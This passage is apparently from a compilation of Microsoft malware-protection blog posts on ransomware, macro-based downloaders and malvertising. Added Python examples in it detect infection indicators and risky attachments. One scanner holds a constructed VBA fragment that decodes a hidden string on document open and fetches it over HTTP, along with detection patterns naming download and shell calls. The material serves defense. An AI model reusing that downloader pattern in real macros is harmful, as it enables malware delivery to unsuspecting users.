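        return 'ransom_note'
    return None


def triage(inventory):
    """inventory: {'files': [paths], 'mutexes': [names], 'run_values': {name: command}}.
    Returns a findings dict consumed by verdict()."""
    findings = {
        'artifacts': set(),
        'encrypted_files': 0,
        'ransom_notes': 0,
        'mutex': MUTEX_NAME in inventory.get('mutexes', []),
        'run_value': RUN_VALUE_NAME in inventory.get('run_values', {}),
    }
    for path in inventory.get('files', []):
        label = classify_path(path)
        if label == 'encrypted_file':
            findings['encrypted_files'] += 1
        elif label == 'ransom_note':
            findings['ransom_notes'] += 1
        elif label:
            findings['artifacts'].add(label)
    return findings


def verdict(findings):
    """The mutex or the persistence value alone is a strong signal; otherwise require
    two independent file artifacts, or encrypted files together with a ransom note."""
    if findings['mutex'] or findings['run_value']:
        return 'likely infected'
    if len(findings['artifacts']) >= 2:
        return 'likely infected'
    if findings['encrypted_files'] and findings['ransom_notes']:
        return 'likely infected'
    if findings['artifacts'] or findings['encrypted_files'] or findings['ransom_notes']:
        return 'suspicious'
    return 'no indicators'


# Constructed host inventories; the user name, drive letter and commands are made up.
INFECTED_HOST = {
    'files': [
        r'C:\Users\alice\AppData\Roaming\zcrypt.exe',
        r'C:\Users\alice\AppData\Roaming\cid.ztxt',
        r'C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zcrypt.lnk',
        r'E:\system.exe',
        r'E:\autorun.inf',
        r'C:\Users\alice\Documents\report.docx.zcrypt',
        r'C:\Users\alice\Documents\How to decrypt files.html',
        r'C:\Users\alice\Documents\notes.txt',
    ],
    'mutexes': ['zcrypt1.0', r'Local\ExplorerIsShellMutex'],
    'run_values': {'zcrypt': r'C:\Users\alice\AppData\Roaming\zcrypt.exe'},
}
CLEAN_HOST = {
    'files': [r'C:\Users\alice\Documents\notes.txt'],
    'mutexes': [r'Local\ExplorerIsShellMutex'],
    'run_values': {'OneDrive': r'C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe'},
}

if __name__ == '__main__':
    for name, host in (('infected', INFECTED_HOST), ('clean', CLEAN_HOST)):
        findings = triage(host)
        print(name, verdict(findings), sorted(findings['artifacts']),
              'encrypted=%d notes=%d' % (findings['encrypted_files'], findings['ransom_notes']))
```

Matching on the path tail rather than the literal c:\users\administrator\... example from the post keeps the check valid for any profile, and the drive-root patterns cover the removable-drive spread described above.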


To help stay protected:

  • Keep your Windows operating system and antivirus up to date. Upgrade to Windows 10.
  • Regularly back up your files to an external hard drive.
  • Enable File History or System Protection. On your Windows 10 or Windows 8.1 devices, you must have File History enabled and a drive set up for it.
  • Use OneDrive for Business.
  • Beware of phishing emails, spam, and malicious attachments.
  • Use Microsoft Edge to get SmartScreen protection. It will prevent you from browsing sites that are known to be hosting exploits, and protect you from socially engineered attacks such as phishing and malware downloads.
  • Disable the loading of macros in your Office programs.
  • Disable your Remote Desktop feature whenever possible.
  • Use two-factor authentication.
  • Use a safe internet connection.
  • Avoid browsing websites that are known for being malware breeding grounds (illegal download sites, porn sites, etc.).



In Office 365’s How to deal with ransomware blog, there are several options for remediating or recovering from a ransomware attack. Here are the ones that apply to a home user or to someone working in the information industry:

  1. Make sure you have backed up your files.
  2. Recover the files on your device. If you previously turned on File History on Windows 10 and Windows 8.1 devices, or System Protection on Windows 7 and Windows Vista devices, you can (in some cases) recover your local files and folders.

To restore your files or folders in Windows 10 and Windows 8.1:

  • Swipe in from the right edge of the screen, tap Search (or if you’re using a mouse, point to the upper-right corner of the screen, move the mouse pointer down, and then click Search). Enter “restore your files” in the search box, and then tap or click Restore your files with File History.
  • Enter the name of the file you’re looking for in the search box, or use the left and right arrows to browse through different versions of your folders and files.
  • Select what you want to restore to its original location, and then tap or click the Restore button. If you want to restore your files onto a different location than the original, press and hold, or right-click the Restore button, tap or click Restore To, and then choose a new location.

Source: Restore files or folders using File History

To restore your files in Windows 7 and Windows Vista

  • Right-click the file or folder, and then click Restore previous versions. You’ll see a list of available previous versions of the file or folder. The list will include files saved on a backup (if you’re using Windows Backup to back up your files) as well as restore points. Note: To restore a previous version of a file or folder that’s included in a library, right-click the file or folder in the location where it’s saved, rather than in the library. For example, to restore a previous version of a picture that’s included in the Pictures library but is stored in the My Pictures folder, right-click the My Pictures folder, and then click Restore previous versions. For more information about libraries, see Include folders in a library.
  • Before restoring a previous version of a file or folder, select the previous version, and then click Open to view it to make sure it’s the version you want. Note: You can’t open or copy previous versions of files that were created by Windows Backup, but you can restore them.
  • To restore a previous version, select the previous version, and then click Restore.

Warning: The file or folder will replace the current version on your computer, and the replacement cannot be undone. Note: If the Restore button isn’t available, you can’t restore a previous version of the file or folder to its original location. However, you might be able to open it or save it to a different location.

Source: Previous versions of files: frequently asked questions

Important: Some ransomware also encrypts or deletes the backup versions, so the steps above will not work. If this is the case, you need to rely on backups on external drives (not affected by the ransomware) or on OneDrive (next step).

Warning: If the folder is synced to OneDrive and you are not using the latest version of Windows, there might be some limitations using File History.

  3. Recover your files in your OneDrive for Consumer
  4. Recover your files in your OneDrive for Business

If you use OneDrive for Business, it will allow you to recover any files you have stored in it. You can use either of the following options:

Restore your files using the Portal

Users can restore previous versions of a file through the user interface. To do this:

1. Go to OneDrive for Business in the portal

2. Right click the file you want to recover, and select Version History.

3. Click the dropdown list of the version you want to recover and select Restore.


If you want to learn more about this feature, take a look at the Restore a previous version of a document in OneDrive for Business support article.

Create a Site Collection Restore service request

If a large number of files were impacted, using the user interface in the portal will not be a viable option. In this case, create a support request for a ‘Site Collection Restore’. This request can restore up to 14 days in the past. To learn how to do this please take a look at the Restore Option in SharePoint Online blog post.



Edgardo Diaz and Marianne Mallen

Microsoft Malware Protection Center (MMPC)

Limited Periodic Scanning in Windows 10 to Provide Additional Malware Protection, 26 May 2016 22:30:03 +0000

Each month, Microsoft’s Malicious Software Removal Tool (MSRT) scans more than 500 million Windows devices for malware and malicious software. Each release detects and removes malware from 1 to 2 million machines, including devices running antivirus software. Meanwhile, many Windows customers continue to use the Microsoft Safety Scanner (MSS) to manually scan their PC for malware.

Windows 10 is the most secure operating system Microsoft has ever shipped, and we continue to make it better with regular security updates and new features. For example, we’re making malware detection and protection even easier and more seamless for our customers, whether they choose to use the built-in Windows Defender antivirus or a third-party antivirus solution. Starting with the Windows 10 Anniversary Update this summer—and available in this week’s Windows Insider build—Windows 10 will include a new security setting called Limited Periodic Scanning. Windows Insiders can enable this feature on unmanaged devices today.

When enabled, Windows 10 will use the Windows Defender scanning engine to periodically scan your PC for threats and remediate them.  These periodic scans will utilize Automatic Maintenance—to ensure the system chooses optimal times based on minimal impact to the user, PC performance, and energy efficiency—or customers can schedule these scans. Limited Periodic Scanning is intended to offer an additional line of defense to your existing antivirus program’s real-time protection.


Enabling Windows 10 Limited Periodic Scanning

If you are not using Windows Defender as your antivirus program on Windows 10, you can enable Limited Periodic Scanning under Settings.

  1. Navigate to Settings -> Update & Security -> Windows Defender.
  2. Turn Limited Periodic Scanning on.

Screenshot of the Limited Periodic Scanning option

If you are already using Windows Defender as your antivirus program on Windows 10, then this feature is already in effect: Windows Defender periodically scans your PC (these are the scheduled scans).


Notifying you of threats found on your PC

When Windows 10 Limited Periodic Scanning is turned ON, and even if you are NOT using Windows Defender for your real-time protection, the Windows Defender user interface and History tab will allow you to view any additional threats that have been detected.

Screenshot of Windows Defender periodic scanning settings

Screenshot of the Windows Defender History settings

When a threat is found, Windows Defender will notify you with a Windows 10 notification. In most cases, Windows Defender will also automatically take action on the threat. Clicking on the notification will open Windows Defender where you can further review the threat that was found and the action that was automatically taken.

Screenshot of the Windows Defender scan notification

Clicking the notification will take you to the Windows Defender main user interface, where additional actions (if required) can be taken and applied.

At this time, Windows 10 Limited Periodic Scanning is intended for consumers. We are evaluating this feature for commercial customers, but Limited Periodic Scanning only applies to unmanaged devices for the Windows 10 Anniversary Update.

Windows 10 is our most secure operating system yet, and we will continue to improve Windows 10 with features like Limited Periodic Scanning. With Windows 10, you can rest assured you’ll always have the latest security protections. To learn more about the security features offered in Windows 10 visit:



Deepak Manohar

Microsoft Malware Protection Center

New Edge Blog: Ensuring high-quality browser accessibility with automation, 26 May 2016 16:30:42 +0000

The Edge team posted a new blog about ensuring high-quality browser accessibility with automated testing. This addition will help ensure accessibility is not accidentally regressed as we make other improvements to the browser.

Ongoing work has helped improve accessibility in Edge, but we want all Windows users to have a remarkable accessibility experience, no matter what browser they’re using. To help the community in this endeavor, Microsoft is open sourcing our HTML 5 Accessibility test harness code on Github with an MIT license.

We hope this can be useful in helping make our products work for everyone, and we look forward to feedback and contributions from the community!

Read the full blog post about these improvements on the Microsoft Edge Developer Blog.

Global Accessibility Awareness Day 2016: The Power of Awareness, 19 May 2016 16:04:33 +0000

The following blog post was written by Jenny Lay-Flurrie, Microsoft Chief Accessibility Officer.

Today is Global Accessibility Awareness Day (GAAD), an international day of action to get people talking, thinking and learning about digital accessibility. For me, it’s a moment to pause and reflect on what I’ve learned since moving into the role of Chief Accessibility Officer earlier this year. It’s been a great and fast learning curve, aided by many of you! I’ve received so many emails from around the globe with ideas, questions and more. As we continue to work on making our products and services more accessible, usable and productive for people with and without disabilities, your feedback is invaluable so please keep it coming!

A lot of the emails were prompted by one particular blog where we shared plans for enhancing the accessibility of our products in 2016. First, I want to assure you we continue to work hard to deliver against those plans. Second, I wanted to share some key themes and programs that I so often highlight in my responses to your emails:

  • Inclusive Hiring: We are thrilled that more and more companies are getting involved and reaching out to get or share ideas on how to better their inclusive hiring practices. We recently created a Microsoft Inclusive Hiring site to provide potential candidates with one place to find information on job opportunities and read stories from employees like Kyle Schwaneke. Inclusive hiring isn’t optional or a “nice to do” – it’s vital to deliver on our strategy. We were thrilled to have 25 likeminded companies participate in our Ability Career Fair this year and will soon announce the 2016/2017 winners of the Disability Scholarships Award. To deliver products that live and breathe accessibility, we must hire great talent with disabilities and advocates that empathize, and look forward to continuing to share more about our journey on disability inclusion.
  • Inclusive Design: The ways in which people interact with our products and services is diverse. This means that to ensure we’re designing products that work for everyone, we must build experiences in a way that is intentionally inclusive of everyone from the beginning. Inclusive Design Sprints enable our designers and engineers to partner with individuals that have a range of disabilities across visual, hearing, speech, mobility and cognitive spectrums. All the resources are online and available for download. If we create a solution that works well for people with disabilities, we’ll help foster better designs for everyone.
  • Windows 10: As we near the one-year anniversary of the availability of Windows 10, we’re making progress toward our vision of more personal computing for everyone. We know there is more work ahead to deliver on this vision, but we’re excited about the progress we’re making. If you are on Windows 10, make sure you have the latest updates, which include improvements to Narrator, Microsoft Edge and the Mail app. Mail on Windows 10 has more intuitive navigation, predictable keyboard behavior and reliability with screen readers. Narrator has improved performance, speed, reliability and usability. We’re working to improve browsing and reading experiences on Microsoft Edge for both built-in assistive technologies and other commercial assistive technology by the end of 2016. Recent updates to Microsoft Edge’s native support for the modern UI Automation accessibility framework were also made. Don’t forget that for customers who use assistive technologies, the July 29 free upgrade deadline for Windows 10 does not apply to you. Stay tuned for details – they are coming! If you’re new to Windows 10, please check out this video to get you started!
  • Office 365: One of the most common questions is what version of Office do I recommend. The answer here is simple, download Office 365. The team is working hard on two simple goals – allow everyone to create more accessible content from a variety of devices and design experiences that allow people of all abilities to be productive on every device. Every month, we’re releasing new updates to Office 365. To be the first to get these, be sure to become an Office Insider. Features like ensuring that others are able to access content in documents by running the Accessibility Checker in Office apps for PCs (coming to Office apps for Mac and Office Online apps by the end of the year). Improvements to Word Online which allow authors to easily add alt-text in documents (coming to additional apps and platforms by the end of the year); screen reader and keyboard/touch navigations for Outlook Mail and Calendar, OneDrive for Business and Yammer (in addition to usability for speech input); as well as the introduction of Tell Me in Office Apps for PC. This team has also published more than 300 articles in the past few months to help you accomplish key tasks. For additional information on enhancements and availability, check out today’s post on the Office Blog. You can also follow our video series on Microsoft Mechanics and check back here for updates.
  • Disability Answer Desk: The top question often comes from a personal place. Ultimately, we all want to understand how technology can help a parent, friend, family member or yourself. It’s our job to make our products easy to use, but we know that sometimes you just need a human to bounce a question, idea or problem off of. The place to go is the Disability Answer Desk. It’s a free service that’s available in English, French and Spanish in 18 countries via email, chat, and direct ASL video in the U.S. It provides technical assistance, general tips and tricks, and is a place to share feedback. We receive around 10,000 inquiries a month and the team is ready to help in any way they can. Bookmark it, use it!
  • The Next Big Thing: Many do not know that within Microsoft, there are several emerging projects dedicated to creating technologies that empower people with disabilities to do more through technology. For example, we introduced the Learning Tools for OneNote Preview, a toolbar add-in which improves the reading and writing experience, especially for those with dyslexia. There is also the Cities Unlocked project, which uses Microsoft 3D soundscape technology to help people with vision loss navigate around town. And, at Microsoft’s 2016 Build Conference, we debuted a new research project called Seeing AI, which is aimed at helping people who are visually impaired or blind understand more about who and what is around them. It’s only a matter of time before next-generation technologies, such as the Seeing AI research project, come to market.

To us, this is about delivering on our mission to empower people and organizations to achieve more. The possibilities are limitless and I can’t wait to share more in coming months. Please check back here to continue receiving the most current accessibility updates from across the company. Thank you again for your support, ideas, and thoughts. The feedback you are sending us on your experiences using our products is hugely important as we continue working to improve technology to better meet your needs – keep it coming! You can share your ideas on the Accessibility Forum, take the Accessibility feedback survey, and don’t forget to bookmark the Disability Answer Desk and Accessibility Blog!

The 5Ws and 1H of Ransomware, 19 May 2016 06:00:40 +0000

Over the past three months, we have seen ransomware hop its way across the globe. The majority of ransomware incidents are found in the United States, followed by Italy and Canada.

Ransomware geographical distribution from February to April 2016

The prevalence of large-scale ransomware incidents led the United States and Canadian governments to issue a joint statement about ransomware. Due to the global ransomware incidents, the Swiss government along with some industry players will also hold the Ransomware InfoDay today, May 19, 2016, as part of the ransomware awareness campaigns.

The following table shows the top 20 countries where ransomware is most prevalent.

Top 20 countries with the most prevalent ransomware incidents

This blog answers the frequently asked questions (who, what, where, when, why, and how) about a type of malware whose effect is so tangible that it locks your files, extorts money from you, and disrupts important public and private operations.

Case in point: RANSOMWARE


Whom does it affect?

You! Do you use any mobile devices, PC, laptop, or the internet for surfing, emailing, working, or shopping online?

Who could be a ransomware victim?

If yes, then you are a potential ransomware victim. Ensure that precautionary measures are taken, see the Prevention section for details.



What is ransomware?

Ransomware is malware that stealthily gets installed on your PC or mobile device and holds your files or operating system functions for ransom. It restricts you from using your PC or mobile device and from accessing your files (files are sometimes locked or encrypted) unless you pay the ransom (in exchange for file decryption).

Paying the ransom (by credit card or in Bitcoin), however, does not guarantee that you’ll get your files back. Prevention is still far better than getting infected and then trying to find a cure. See our Ransomware page for details.



What does a ransomware attack look like?

Ransomware targets your pictures, documents, files, and data that are personally valuable to you.

You can tell that you are under attack when you see any of the following:

  • Ransomware note
  • Encrypted files
  • Renamed files
  • Locked browser
  • Locked screen

However, the symptoms of a ransomware attack vary from one ransomware type to another:

Sample ransomware lockscreens and ransom notes


What!?! There are several ransomware types?

Yes. Since it first surfaced in 1989, ransomware has morphed into different forms, adapting to people’s computing habits, to newer technologies, and to the monetization strategies available.

There are two types of ransomware – lockscreen ransomware and encryption ransomware.

  • Lockscreen ransomware shows a full-screen message that prevents you from accessing your PC or files. It says you have to pay money (a “ransom”) to get access to your PC again.
  • Encryption ransomware changes your files so you can’t use them. It does this by encrypting the files – see the Details for enterprises section if you’re interested in the technologies and techniques we’ve seen.

Older ransomware usually claims you have done something illegal with your PC, and that you are being fined by a police force or government agency.

These claims are false. It is a scare tactic designed to make you pay the money without telling anyone who might be able to restore your PC.

Ransomware history from 1989 to 2016


Where can a ransomware attack happen?

Computers and mobile devices.

Ransomware employs its encryption and monetization strategies across PC and mobile devices.





When can a ransomware attack start?

Ransomware attack workflow

Potential victims can fall into the ransomware trap if they are:

  • Browsing untrusted websites
  • Downloading or opening attachments from spam emails, which are known to carry malicious code. That includes compressed files or files inside archives. Such attachments can be:
    • Executables (.ade, .adp, .ani, .bas, .bat, .chm, .cmd, .com, .cpl, .crt, .hlp, .ht, .hta, .inf, .ins, .isp, .job, .js, .jse, .lnk, .mda, .mdb, .mde, .mdz, .msc, .msi, .msp, .mst, .pcd, .reg, .scr, .sct, .shs, .url, .vb, .vbe, .vbs, .wsc, .wsf, .wsh, .exe, .pif, etc.)
    • Office files that support macros (.doc, .xls, .docm, .xlsm, .pptm, etc.)
  • Installing pirated software, or running outdated programs or operating systems
  • Using a PC that is connected to an already infected network
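As an added example (not code from the original post), here is a Python mail-attachment check built from the two extension lists above. It classifies each attachment by its last extension, looks inside zip archives because, as noted above, the dangerous file is often compressed or nested inside an archive, and flags executables and macro-capable Office files. The sample attachments are constructed in memory; the category names and the zip-only archive handling are this example's own choices.

```python
"""Classify mail attachments by the extension lists given above, including
files inside archives.

Added example, not from the original post. The two extension lists are the
ones printed in the post; the sample message attachments are constructed in
memory so the script runs offline.
"""
import io
import os
import zipfile
from typing import Dict, List, Tuple

# Extensions the post lists as executable / script content
EXECUTABLE_EXTS = {
    ".ade", ".adp", ".ani", ".bas", ".bat", ".chm", ".cmd", ".com", ".cpl", ".crt",
    ".hlp", ".ht", ".hta", ".inf", ".ins", ".isp", ".job", ".js", ".jse", ".lnk",
    ".mda", ".mdb", ".mde", ".mdz", ".msc", ".msi", ".msp", ".mst", ".pcd", ".reg",
    ".scr", ".sct", ".shs", ".url", ".vb", ".vbe", ".vbs", ".wsc", ".wsf", ".wsh",
    ".exe", ".pif",
}
# Office formats the post lists as supporting macros
MACRO_OFFICE_EXTS = {".doc", ".xls", ".docm", ".xlsm", ".pptm"}
# Archive types we look inside (zip only in this example; .gz/.tar are left out)
ARCHIVE_EXTS = {".zip"}


def classify_name(name: str) -> str:
    """Return 'executable', 'macro-office', 'archive' or 'other' for a file name.

    Only the last extension counts, so 'invoice.pdf.exe' is classified by
    '.exe', which is what a mail filter must do.
    """
    ext = os.path.splitext(name.lower())[1]
    if ext in EXECUTABLE_EXTS:
        return "executable"
    if ext in MACRO_OFFICE_EXTS:
        return "macro-office"
    if ext in ARCHIVE_EXTS:
        return "archive"
    return "other"


def classify_attachment(name: str, data: bytes, depth: int = 0, max_depth: int = 3) -> List[Tuple[str, str]]:
    """Classify an attachment and, recursively, the members of any zip it contains.

    Returns (path, verdict) pairs; nested members are reported as 'outer.zip/inner'.
    max_depth bounds recursion so a zip-in-zip-in-zip bomb cannot run away.
    """
    verdict = classify_name(name)
    results = [(name, verdict)]
    if verdict == "archive" and depth < max_depth and zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for info in zf.infolist():
                if info.is_dir():
                    continue
                inner = zf.read(info)
                for path, inner_verdict in classify_attachment(info.filename, inner, depth + 1, max_depth):
                    results.append((f"{name}/{path}", inner_verdict))
    return results


def risky_attachments(attachments: Dict[str, bytes]) -> List[str]:
    """Names (including archive member paths) that should be blocked or quarantined."""
    flagged = []
    for name, data in attachments.items():
        for path, verdict in classify_attachment(name, data):
            if verdict in ("executable", "macro-office"):
                flagged.append(path)
    return flagged


def sample_message() -> Dict[str, bytes]:
    """Constructed attachments: a PDF, a macro-enabled document, and a zip hiding a .js file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2016/Invoice.js", "// constructed, harmless placeholder\n")
        zf.writestr("Invoice_2016/readme.txt", "plain text\n")
    return {
        "brochure.pdf": b"%PDF-1.4 constructed placeholder",
        "ORDER-details.docm": b"PK constructed placeholder",
        "Invoice_2016.zip": buf.getvalue(),
    }


if __name__ == "__main__":
    for path in risky_attachments(sample_message()):
        print("BLOCK:", path)
```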


Why do malware perpetrators victimize people with ransomware?

Because they have malicious or criminal intentions and see it as an easy way to make money. They take advantage of people’s ignorance, unpatched software vulnerabilities, or zero-day vulnerabilities.

Ransomware in the news affecting crucial public and private services


For enterprises, it also damages security and reputation: some ransomware incidents have halted crucial services such as hospitals, forcing the affected organizations to pay up if they have not backed up their data.

Why must you educate yourself about ransomware?

Because it can take your hard-earned money in exchange for the stuff you already own: your data or files! Exxroute ransomware, for example, demands $500 and doubles the ransom if you delay payment. It also starts deleting your files if you delay the payment.

It can also violate your privacy, disrupt your work or personal life, and possibly harm your reputation.

If the ransomware perpetrators are cashing in on people’s ignorance, then educating yourself about it can help disrupt their business.

Download the ransomware infographics here.

How can you avoid and bounce back from a ransomware attack?


  • Keep your Windows operating system and antivirus up to date. Upgrade to Windows 10.
  • Regularly back up your files to an external hard drive.
  • Enable File History or System Protection. On Windows 10 and Windows 8.1 devices, File History must be turned on and a drive set up for it.
  • Use OneDrive for Consumer or for Business.
  • Beware of phishing emails and spam, and do not open unexpected attachments.
  • Use Microsoft Edge to get SmartScreen protection. It will prevent you from browsing sites that are known to host exploits, and protect you from socially engineered attacks such as phishing and malware downloads.
  • Disable the loading of macros in your Office programs.
  • Disable Remote Desktop whenever possible.
  • Use two-factor authentication.
  • Use a trusted, password-protected internet connection.
  • Avoid browsing websites that are known as malware breeding grounds (illegal download sites, porn sites, etc.).



In Office 365’s How to deal with ransomware blog, there are several options for remediating or recovering from a ransomware attack. Here are the ones that apply to a home user or to someone working in the information industry:

  1. Make sure you have backed up your files.
  2. Recover the files on your device. If you previously turned on File History on Windows 10 and Windows 8.1 devices, or System Protection on Windows 7 and Windows Vista devices, you can (in some cases) recover your local files and folders.

To restore your files or folders in Windows 10 and Windows 8.1:

  • Swipe in from the right edge of the screen, tap Search (or if you’re using a mouse, point to the upper-right corner of the screen, move the mouse pointer down, and then click Search). Enter “restore your files” in the search box, and then tap or click Restore your files with File History.
  • Enter the name of the file you’re looking for in the search box, or use the left and right arrows to browse through different versions of your folders and files.
  • Select what you want to restore to its original location, and then tap or click the Restore button. If you want to restore your files onto a different location than the original, press and hold, or right-click the Restore button, tap or click Restore To, and then choose a new location.

Source: Restore files or folders using File History

To restore your files in Windows 7 and Windows Vista

  • Right-click the file or folder, and then click Restore previous versions. You’ll see a list of available previous versions of the file or folder. The list will include files saved on a backup (if you’re using Windows Backup to back up your files) as well as restore points. Note: To restore a previous version of a file or folder that’s included in a library, right-click the file or folder in the location where it’s saved, rather than in the library. For example, to restore a previous version of a picture that’s included in the Pictures library but is stored in the My Pictures folder, right-click the My Pictures folder, and then click Restore previous versions. For more information about libraries, see Include folders in a library.
  • Before restoring a previous version of a file or folder, select the previous version, and then click Open to view it to make sure it’s the version you want. Note: You can’t open or copy previous versions of files that were created by Windows Backup, but you can restore them.
  • To restore a previous version, select the previous version, and then click Restore.

Warning: The file or folder will replace the current version on your computer, and the replacement cannot be undone. Note: If the Restore button isn’t available, you can’t restore a previous version of the file or folder to its original location. However, you might be able to open it or save it to a different location.

Source: Previous versions of files: frequently asked questions

Important: Some ransomware also encrypts or deletes the backup versions, so the steps above will not work. If this is the case, you need to rely on backups on external drives (not affected by the ransomware) or on OneDrive (next step).

Warning: If the folder is synced to OneDrive and you are not using the latest version of Windows, there might be some limitations using File History.

3. Recover your files in your OneDrive for Consumer.

4. Recover your files in your OneDrive for Business.

If you use OneDrive for Business, it will allow you to recover any files you have stored in it. You can use either of the following options:

Restoring the files using the Portal

Users can restore previous versions of a file through the user interface. To do this:

1. Go to OneDrive for Business in the portal.

2. Right click the file you want to recover, and select Version History.

3. Click the dropdown list of the version you want to recover and select Restore.


If you want to learn more about this feature, take a look at the Restore a previous version of a document in OneDrive for Business support article.

Site Collection Restore service request

If a large number of files were impacted, using the user interface in the portal will not be a viable option. In this case, create a support request for a ‘Site Collection Restore’. This request can restore up to 14 days in the past. To learn how to do this please take a look at the Restore Option in SharePoint Online blog post.


Microsoft Malware Protection Center


Malicious macro using a sneaky new trick, 18 May 2016 03:13:34 +0000

We recently came across a file (ORDER-549-6303896-2172940.docm, SHA1: 952d788f0759835553708dbe323fd08b5a33ec66) containing a VBA project that scripts a malicious macro (SHA1: 73c4c3869304a10ec598a50791b7de1e7da58f36). We added it under the detection TrojanDownloader:O97M/Donoff, a large family of Office-targeting macro-based malware that has been active for several years (see our blog category on macro-based malware for more posts).

However, there wasn’t an immediate, obvious identification that this file was actually malicious. It’s a Word file that contains seven VBA modules and a VBA user form with a few buttons (using the CommandButton elements).

Screenshot of VBA script editor showing the user form and list of modules

The VBA user form contains three buttons


The VBA modules look like legitimate macro-driven SQL code, and no malicious code is found there. However, after further investigation we noticed a strange string in the Caption field for CommandButton3 in the user form.

It appeared to be some sort of encrypted string.

We went back and reviewed the other modules in the file, and sure enough, there is something unusual going on in Module2. A macro there (UsariosConectados) decrypts the string in the Caption field for CommandButton3, which turns out to be a URL. The project uses the default autoopen() macro so that the whole VBA project runs when the document is opened.

Screenshot of the VBA macro script in Module2 that decrypts the Caption string

The macro script in Module2 decrypts the string in the Caption field


The macro will connect to the URL (hxxp://<uniqueid>) to download a payload which we detect as Ransom:Win32/Locky (SHA1: b91daa9b78720acb2f008048f5844d8f1649a5c4).

The VBA project (and, therefore, the macro) will automatically run if the user enables macros when opening the file – our strongest suggestion for the prevention of Office-targeting macro-based malware is to only enable macros if you wrote the macro yourself, or completely trust and know the person who wrote it.
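As an added example (not the analysed file and not Microsoft's detection logic), the Python script below applies the pattern described above as a triage heuristic over VBA source: an auto-run entry point, a string read from a form control's Caption property, a character-decoding loop, and a download call, with a verdict that only fires when these co-occur. The VBA fragments it scans are constructed to mimic that structure, and the regexes and verdict thresholds are assumptions of this example.

```python
"""Heuristic triage of VBA source for the pattern described above: an auto-run
entry point, a string pulled from a form control's Caption property, a decode
loop, and a download/execute call.

Added example, not the analysed sample and not Microsoft's detection logic.
The VBA text below is constructed to mimic the described structure; the
regexes are illustrative heuristics, not a complete signature set.
"""
import re
from typing import Dict, List

# Constructed VBA fragments (not the real ORDER-549 file)
SAMPLE_MODULE = r'''
Sub autoopen()
    UsariosConectados
End Sub

Sub UsariosConectados()
    Dim s As String, out As String, i As Integer
    s = UserForm1.CommandButton3.Caption
    For i = 1 To Len(s)
        out = out & Chr(Asc(Mid(s, i, 1)) Xor 7)
    Next i
    Set http = CreateObject("MSXML2.XMLHTTP")
    http.Open "GET", out, False
    http.Send
End Sub
'''

SAMPLE_BENIGN = r'''
Sub RefreshReport()
    Dim cn As Object
    Set cn = CreateObject("ADODB.Connection")
    cn.Open "Provider=SQLOLEDB;Data Source=srv;Initial Catalog=sales"
    Sheets("Report").QueryTables(1).Refresh
End Sub
'''

# Each category maps to regexes; hits across several categories are what matter.
PATTERNS: Dict[str, List[str]] = {
    "autoexec": [r"\bSub\s+(AutoOpen|Auto_Open|Document_Open|Workbook_Open)\b"],
    "form_control_string": [r"\.CommandButton\d*\.Caption\b", r"\.(Caption|Tag|ControlTipText)\b"],
    "decode_loop": [r"\bFor\b.*\bLen\(", r"\bChr\s*\(", r"\bXor\b", r"\bMid\s*\("],
    "network_or_exec": [r"MSXML2\.XMLHTTP", r"WinHttp\.WinHttpRequest", r"URLDownloadToFile",
                        r"\bShell\s*\(", r"WScript\.Shell", r"ADODB\.Stream"],
}


def scan_vba(source: str) -> Dict[str, List[str]]:
    """Return, per category, the pattern strings that matched the source (case-insensitive)."""
    hits: Dict[str, List[str]] = {}
    for category, regexes in PATTERNS.items():
        matched = [rx for rx in regexes if re.search(rx, source, re.IGNORECASE)]
        if matched:
            hits[category] = matched
    return hits


def verdict(source: str) -> str:
    """'suspicious' when an auto-run entry point reads a form-control string and
    also decodes it or talks to the network; 'review' on two or more partial
    categories; 'clean' otherwise. The SQL-style macro above stays clean."""
    categories = set(scan_vba(source))
    if "autoexec" in categories and "form_control_string" in categories and (
        "decode_loop" in categories or "network_or_exec" in categories
    ):
        return "suspicious"
    if len(categories) >= 2:
        return "review"
    return "clean"


if __name__ == "__main__":
    for label, src in (("constructed sample", SAMPLE_MODULE), ("benign SQL macro", SAMPLE_BENIGN)):
        print(label, "->", verdict(src), scan_vba(src))
```

In practice the VBA source would come from a tool such as olevba; the point of the heuristic is that none of the four categories is malicious on its own (a legitimate form reads its own Caption, a legitimate macro calls Shell), but an auto-run macro that decodes a form-control string and then fetches a URL is the shape this sample used.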

See our threat intelligence report on macros and our macro-based malware page for further guidance on preventing and recovering from these types of attacks.

-Marianne Mallen and Wei Li

New Edge Blog: Building a more accessible user experience with HTML5 and UIA, 13 May 2016 18:15:56 +0000

The Edge team posted a new blog that walks through ongoing work to advance Edge’s accessibility. The goal is to ensure developers and users can easily get accurate information on platform accessibility across browsers, making it easier to build more accessible sites and make informed decisions when using accessibility features. The blog includes some concrete examples of how the new Edge accessibility architecture improves the end user’s experience, and specifically how markup defines the experience of navigating with assistive technologies like screen readers. The many examples in the blog focus on Narrator, but any screen reader using UIA will be able to take advantage of these improvements.

Read the full blog post about these improvements on the Microsoft Edge Developer Blog.

Large Kovter digitally-signed malvertising campaign and MSRT cleanup release, 10 May 2016 22:12:20 +0000

Kovter is a malware family that is well known for being tricky to detect and remove because of its file-less design after infection. Users in the United States are almost exclusively targeted, and infected PCs are used to perform click fraud and to install additional malware.

Starting April 21, 2016, we observed a large Kovter malware attack in which, in just a week and a half, we protected over 350,000 PCs from this threat. Interestingly, for this campaign the attackers managed to obtain trusted SSL/TLS certificates to serve their content over HTTPS, as well as their own code-signing certificate to sign the downloaded malware.

Kovter carried out this attack campaign using a technique called malvertising, masquerading as a fake Adobe Flash update. In this blog we will share some research into the structure of their malvertising attack, how our MSRT release will be cleaning it up, and the technical details of how Kovter installs and attempts to remain persistent as a file-less malware after it infects a PC.

Kovter’s digitally signed malvertising campaign

Malvertising is a technique used by bad actors to attack your PC: they buy advertisement space from ad networks, ad exchanges, and ad publishers. These ads then appear on the many websites that use the same advertisement network, and attack some of the users as they visit those websites.

Unlike typical advertisements that require a user click, malvertising attacks often attack as soon as you visit a website that displays them.

Using this technique, we’ve seen malicious attackers use varied techniques such as:

  • Displaying repeated message boxes claiming your PC is infected and encouraging you to call a support phone number for help. These are malicious and they have not detected a problem on your PC.
